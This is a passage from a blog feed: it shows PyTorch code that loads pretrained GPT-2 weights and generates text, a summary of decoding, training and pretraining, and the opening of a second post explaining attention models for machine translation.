</span>    <span class="n">os</span><span class="p">.</span><span class="n">makedirs</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="n">exist_ok</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
        <span class="c1"># Build URLs with "/" explicitly; os.path.join would use backslashes on Windows</span>
        <span class="n">file_url</span> <span class="o">=</span> <span class="s">"/"</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">base_url</span><span class="p">,</span> <span class="n">model_size</span><span class="p">,</span> <span class="n">filename</span><span class="p">])</span>
        <span class="n">backup_url</span> <span class="o">=</span> <span class="s">"/"</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">backup_base_url</span><span class="p">,</span> <span class="n">model_size</span><span class="p">,</span> <span class="n">filename</span><span class="p">])</span>
        <span class="n">file_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
        <span class="n">download_file</span><span class="p">(</span><span class="n">file_url</span><span class="p">,</span> <span class="n">file_path</span><span class="p">,</span> <span class="n">backup_url</span><span class="p">)</span>

    <span class="c1"># Load settings and params
</span>    <span class="n">tf_ckpt_path</span> <span class="o">=</span> <span class="n">tf</span><span class="p">.</span><span class="n">train</span><span class="p">.</span><span class="n">latest_checkpoint</span><span class="p">(</span><span class="n">model_dir</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="s">"hparams.json"</span><span class="p">))</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">settings</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">=</span> <span class="n">load_gpt2_params_from_tf_ckpt</span><span class="p">(</span><span class="n">tf_ckpt_path</span><span class="p">,</span> <span class="n">settings</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">settings</span><span class="p">,</span> <span class="n">params</span>

<span class="c1"># Define model configurations in a dictionary for compactness
</span><span class="n">model_configs</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"gpt2-small (124M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">768</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">12</span><span class="p">},</span>
    <span class="s">"gpt2-medium (355M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1024</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">24</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">16</span><span class="p">},</span>
    <span class="s">"gpt2-large (774M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1280</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">36</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">20</span><span class="p">},</span>
    <span class="s">"gpt2-xl (1558M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1600</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">48</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">25</span><span class="p">},</span>
<span class="p">}</span>

<span class="c1"># Copy the base configuration and update with specific model settings
</span><span class="n">model_name</span> <span class="o">=</span> <span class="s">"gpt2-small (124M)"</span>  <span class="c1"># Example model name
</span><span class="n">NEW_CONFIG</span> <span class="o">=</span> <span class="n">GPT_CONFIG_124M</span><span class="p">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">NEW_CONFIG</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">model_configs</span><span class="p">[</span><span class="n">model_name</span><span class="p">])</span>
<span class="n">NEW_CONFIG</span><span class="p">.</span><span class="n">update</span><span class="p">({</span><span class="s">"context_length"</span><span class="p">:</span> <span class="mi">1024</span><span class="p">,</span> <span class="s">"qkv_bias"</span><span class="p">:</span> <span class="bp">True</span><span class="p">})</span>

<span class="n">gpt</span> <span class="o">=</span> <span class="n">GPTModel</span><span class="p">(</span><span class="n">NEW_CONFIG</span><span class="p">)</span>
<span class="n">gpt</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">assign</span><span class="p">(</span><span class="n">left</span><span class="p">,</span> <span class="n">right</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">left</span><span class="p">.</span><span class="n">shape</span> <span class="o">!=</span> <span class="n">right</span><span class="p">.</span><span class="n">shape</span><span class="p">:</span>
        <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Shape mismatch. Left: </span><span class="si">{</span><span class="n">left</span><span class="p">.</span><span class="n">shape</span><span class="si">}</span><span class="s">, Right: </span><span class="si">{</span><span class="n">right</span><span class="p">.</span><span class="n">shape</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">torch</span><span class="p">.</span><span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="n">right</span><span class="p">))</span>

<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span>

<span class="k">def</span> <span class="nf">load_weights_into_gpt</span><span class="p">(</span><span class="n">gpt</span><span class="p">,</span> <span class="n">params</span><span class="p">):</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">'wpe'</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">'wte'</span><span class="p">])</span>
    
    <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">])):</span>
        <span class="n">q_w</span><span class="p">,</span> <span class="n">k_w</span><span class="p">,</span> <span class="n">v_w</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">split</span><span class="p">(</span>
            <span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_attn"</span><span class="p">])[</span><span class="s">"w"</span><span class="p">],</span> <span class="mi">3</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">q_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">k_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">v_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>

        <span class="n">q_b</span><span class="p">,</span> <span class="n">k_b</span><span class="p">,</span> <span class="n">v_b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">split</span><span class="p">(</span>
            <span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_attn"</span><span class="p">])[</span><span class="s">"b"</span><span class="p">],</span> <span class="mi">3</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">q_b</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">k_b</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">v_b</span><span class="p">)</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_fc"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_fc"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_1"</span><span class="p">][</span><span class="s">"g"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_1"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_2"</span><span class="p">][</span><span class="s">"g"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_2"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

    <span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"g"</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"b"</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">out_head</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">out_head</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"wte"</span><span class="p">])</span>
    
    
<span class="n">load_weights_into_gpt</span><span class="p">(</span><span class="n">gpt</span><span class="p">,</span> <span class="n">params</span><span class="p">)</span>
<span class="n">gpt</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>

<span class="n">token_ids</span> <span class="o">=</span> <span class="n">generate</span><span class="p">(</span>
    <span class="n">model</span><span class="o">=</span><span class="n">gpt</span><span class="p">,</span>
    <span class="n">idx</span><span class="o">=</span><span class="n">text_to_token_ids</span><span class="p">(</span><span class="s">"Every effort moves you"</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">),</span>
    <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">25</span><span class="p">,</span>
    <span class="n">context_size</span><span class="o">=</span><span class="n">NEW_CONFIG</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">top_k</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span>
    <span class="n">temperature</span><span class="o">=</span><span class="mf">1.5</span>
<span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Output text:</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">token_ids_to_text</span><span class="p">(</span><span class="n">token_ids</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">))</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Output text:
 Every effort moves you toward finding an ideal new way to practice something!

What makes us want to be on top of that?
</code></pre></div></div>

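<h2 id="总结-1">Summary</h2>

<p>This part covered how LLMs generate text (greedy decoding, probabilistic sampling, and temperature scaling), how they are trained (loss function and optimizer), and the challenges of pretraining along with an alternative (using publicly available pretrained weights). Together, these techniques underpin efficient LLM training and text generation.</p>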

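<h3 id="1文本生成过程">1. <strong>Text generation</strong></h3>

<ul>
  <li>When an LLM generates text, it outputs one <strong>token</strong> at a time.</li>
  <li>By default, the model converts its outputs into probability scores and picks the token with the highest probability as the next token (known as <strong>greedy decoding</strong>).</li>
  <li>To control the trade-off between diversity and coherence in the generated text, <strong>probabilistic sampling</strong> and <strong>temperature scaling</strong> can be used.</li>
</ul>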
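
<p>The three decoding choices listed above can be sketched in plain Python. This is a minimal illustration under stated assumptions: the five logits are made-up scores for a toy vocabulary, and the helper names <code class="language-plaintext highlighter-rouge">softmax</code>, <code class="language-plaintext highlighter-rouge">greedy_decode</code>, and <code class="language-plaintext highlighter-rouge">sample_top_k</code> are hypothetical, not the <code class="language-plaintext highlighter-rouge">generate</code> function used earlier.</p>

```python
import math
import random


def softmax(logits, temperature=1.0):
    """Turn raw scores into probabilities; temperature rescales the logits first."""
    scaled = [x / temperature for x in logits]
    peak = max(scaled)  # subtract the maximum for numerical stability
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def greedy_decode(logits):
    """Greedy decoding: always pick the index with the highest score."""
    return max(range(len(logits)), key=lambda i: logits[i])


def sample_top_k(logits, top_k, temperature, rng):
    """Keep the top_k highest logits, apply temperature, then sample one index."""
    kept = sorted(range(len(logits)), key=lambda i: logits[i], reverse=True)[:top_k]
    probs = softmax([logits[i] for i in kept], temperature)
    return rng.choices(kept, weights=probs, k=1)[0]


# Hypothetical next-token scores for a toy vocabulary of five tokens.
toy_logits = [2.0, 1.0, 0.5, -1.0, -3.0]
rng = random.Random(123)

greedy_token = greedy_decode(toy_logits)
sampled_token = sample_top_k(toy_logits, top_k=3, temperature=1.5, rng=rng)
sharp = softmax(toy_logits, temperature=0.5)  # low temperature: peaked distribution
flat = softmax(toy_logits, temperature=1.5)   # high temperature: flatter distribution
print(greedy_token, sampled_token, round(sharp[0], 3), round(flat[0], 3))
```

<p>Greedy decoding is deterministic, while sampling can return any of the kept tokens. Raising the temperature flattens the distribution, so less likely tokens are chosen more often.</p>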

<hr />

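<h3 id="2训练与验证">2. <strong>Training and validation</strong></h3>

<ul>
  <li>The <strong>loss</strong> on the training and validation sets is used to gauge the quality of the text the LLM generates during training.</li>
  <li>The goal of training an LLM is to minimize the training loss by adjusting the model weights.</li>
  <li>Training follows the standard deep learning procedure, using the <strong>cross entropy loss</strong> and the <strong>AdamW optimizer</strong>.</li>
</ul>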
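
<p>To make the loss in the list above concrete, here is a small sketch of the cross entropy computed by hand: the average negative log-probability that the model assigns to the correct next token. The logits and target ids are made-up values, and the function name <code class="language-plaintext highlighter-rouge">cross_entropy</code> is only illustrative. In PyTorch the same quantity is normally obtained with <code class="language-plaintext highlighter-rouge">torch.nn.functional.cross_entropy</code>.</p>

```python
import math


def cross_entropy(logits_per_position, target_ids):
    """Average negative log-probability assigned to the correct next tokens."""
    total = 0.0
    for logits, target in zip(logits_per_position, target_ids):
        peak = max(logits)
        # log of the softmax denominator, computed in a numerically stable way
        log_norm = peak + math.log(sum(math.exp(x - peak) for x in logits))
        total += log_norm - logits[target]  # equals -log softmax(logits)[target]
    return total / len(target_ids)


# Hypothetical logits for two positions over a three-token vocabulary.
toy_logits = [[2.0, 0.5, -1.0], [0.1, 0.2, 3.0]]
confident_loss = cross_entropy(toy_logits, [0, 2])  # targets are the highest-scoring tokens
wrong_loss = cross_entropy(toy_logits, [2, 0])      # targets are low-scoring tokens
uniform_loss = cross_entropy([[0.0, 0.0, 0.0]], [1])  # uniform guess over 3 tokens
print(confident_loss, wrong_loss, uniform_loss)
```

<p>The loss is small when the correct tokens receive high scores and large when they do not. A uniform guess over a vocabulary of size V gives a loss of log(V), a useful reference point for an untrained model.</p>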

<hr />

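<h3 id="3预训练">3. <strong>Pretraining</strong></h3>

<ul>
  <li>Pretraining an LLM requires a large text corpus, which makes it a <strong>time-consuming and resource-intensive</strong> process.</li>
  <li>To avoid pretraining from scratch, publicly available pretrained weights (such as the weights released by OpenAI) can be loaded instead.</li>
</ul>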

<hr />

<h1 id="总结-2">Summary</h1>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="pytorch" /><category term="attention" /><category term="LLM" /><summary type="html"><![CDATA[Reading the book Build Large Language Model]]></summary></entry><entry><title type="html">Attention mechanism</title><link href="https://crabin.github.io/posts/2025/1/Attention%20mechanism/" rel="alternate" type="text/html" title="Attention mechanism" /><published>2025-01-13T00:00:00+00:00</published><updated>2025-01-13T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2025/1/Attention%20mechanism</id><content type="html" xml:base="https://crabin.github.io/posts/2025/1/Attention%20mechanism/"><![CDATA[<h2 id="pytorch-注意力模型实现详解以简单的机器翻译为例">PyTorch Attention Model Implementation Explained (Using Simple Machine Translation as an Example)</h2>

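<p>The "attention" in Transformer originates from earlier attention models in NLP. Implementing an attention model by hand gives a deeper understanding of how attention works and makes it easier to study Transformer and other later attention-based models. In this article, I share how to implement an attention model with PyTorch's basic APIs and complete a simple machine translation project: "translating" dates written in various formats into a single standard format.</p>

<p>For background on machine translation and attention models, please refer to my earlier articles, such as the one on sequence models and the attention mechanism.</p>

<p>Project repository: https://github.com/SingleZombie/DL-Demos/tree/master/dldemos/attention</p>

<h3 id="知识背景">Background</h3>
<p>Attention models originated in machine translation. The earliest RNN-based machine translation models all used the following architecture:</p>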

<p><img src="pytorch_images/1.jpg" alt="image" /></p>

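<p>The first half of the RNN only takes input, and the second half only produces output. The two halves pass information through a single hidden state. If we regard that hidden state as an encoding of the input, the first half can be called the "encoder" and the second half the "decoder". This architecture is therefore known as the "encoder-decoder" architecture.</p>

<p>This architecture works for short sentences but struggles with long texts. With an encoder-decoder architecture, the input is compressed into one short, fixed-size encoding no matter how long it is. In other words, the model must read the entire input at once and then emit the entire translation at once, which is clearly not a good approach. By contrast, a human translator usually reads a sentence, translates it, then reads the next sentence and translates that. The attention model was proposed based on this idea, and it can translate long texts effectively.</p>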

<p><img src="pytorch_images/2.jpg" alt="image" /></p>

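<p>In an attention model, the encoder and decoder are connected in a different way. After encoding is complete, the decoder draws relevant information from each encoder output with a different weight; that is, it pays a different amount of "attention" to each part of the input.</p>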

<p><img src="pytorch_images/3.jpg" alt="image" /></p>

<p>Specifically, the structure of the attention model is as follows.</p>

<p><img src="pytorch_images/4.jpg" alt="image" /></p>

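<p>For the output $\hat{y}_t$ at each step $t$, the input to the decoder RNN is the concatenation of the previous output $\hat{y}_{t-1}$ and the attention context $c_t$. The attention context $c_t$ is a weighted average of the encoder RNN hidden states $a_{t'}$ over all input positions $t'$. The weights $\alpha_{t,t'}$ of this weighted average are the attention that the output pays to each input. Each $\alpha_{t,t'}$ is determined by the encoder RNN state $a_{t'}$ at that position and the decoder RNN state $s_{t-1}$ from the previous step. These two inputs are fed into a simple fully connected network that outputs an unnormalized weight $e_{t,t'}$ (a real number). The values $e_{t,t'}$ for all input elements are then passed through a softmax to produce $\alpha_{t,t'}$.</p>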
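
<p>One decoding step of the computation described above can be sketched in plain Python: score each encoder state together with the previous decoder state, apply a softmax over the input positions, and take the weighted average. This is only an illustration under stated assumptions: the states, the weight vector, and the function name <code class="language-plaintext highlighter-rouge">attention_context</code> are made up, and the scoring network is reduced to a single linear layer.</p>

```python
import math


def attention_context(encoder_states, prev_decoder_state, weight, bias):
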